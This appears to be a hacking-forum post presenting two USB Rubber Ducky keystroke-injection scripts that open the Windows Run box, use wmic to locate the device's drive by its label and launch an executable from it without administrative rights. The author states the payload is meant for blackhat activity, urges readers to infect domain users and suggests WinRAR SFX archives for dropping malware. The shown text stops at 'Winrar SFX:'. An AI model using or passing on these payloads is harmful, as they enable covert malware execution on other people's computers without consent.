For long I have been searching around for a payload as such, but the only thing I found was the following; https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd Which essentially is not even 10% efficient. You need Administrative rights to use the Payload above (Diskpart) and what's with the Vbs. If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a Winrar SFX which will put your malware into which folder you wish and run it there. Tutorial on that will come later, as I have too much to do. The below payload takes 3-4 seconds before executing. You have to remount (Plug in the Rubber ducky, let it install drivers, then replug it and have your file be executed). DELAY 3000 GUI r DELAY 100 STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe DELAY 10 ENTER That one is one of the codes, simple AF. It goes into Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in matter of seconds. I believe the Terminal is up for a matter of seconds not even that. You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it. This is another code, does the same, but is shorter: DELAY 3000 GUI r DELAY 100 cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe DELAY 10 ENTER The code above is almost instant (Depends on your malware size) And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits. New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute. I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems. And go on infect domain users. Winrar SFX: